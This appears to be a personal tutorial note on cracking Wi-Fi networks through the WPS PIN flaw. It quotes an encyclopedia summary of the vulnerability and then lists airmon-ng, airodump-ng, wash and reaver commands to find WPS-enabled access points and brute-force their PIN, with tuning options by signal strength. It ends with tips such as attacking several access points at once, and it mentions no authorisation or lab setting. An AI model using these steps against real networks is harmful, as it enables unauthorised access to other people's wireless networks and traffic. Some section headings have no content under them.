About WPS

What WIKI says:

Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. Prior to the standard, several competing solutions were developed by different vendors to address the same need. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models.

Time cost calcuation

PIN code

Have a try

# 1) prerequisite
airmon-ng check kill


# 2) gather infomation
# Set your wireless interface in monitor mode
airmon-ng start wlan0

# list all the APs that can be searched (optional, get gain value mostly)
airodump-ng wlan0mon

# list APs which enable WPS
wash -i wlan0mon -C


# 3) let's reaver
# MAC is BSSID
# -c needs a channel number
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv - c 1


# optional choices
# signal is good
reaver -i wlan0mon -b MAC -a -S -vv -d0 -c 1
# signal is soso
reaver -i wlan0mon -b MAC -a -S -vv -d2 -t 5 -c 1
# signal is pool
reaver -i wlan0mon -b MAC -a -S -vv -d5 -c 1

Notice

• Something wrong with wireless card. I use TPLINK WN722N adapter. Sometimes it stops cracking(not working), plug out --> plug in action required.
• Pick the AP which has a HIGH gain value and make sure the AP got WPS enabled.
• AP is very choosy, won't let you associate.
• Try cracking more than one AP per time.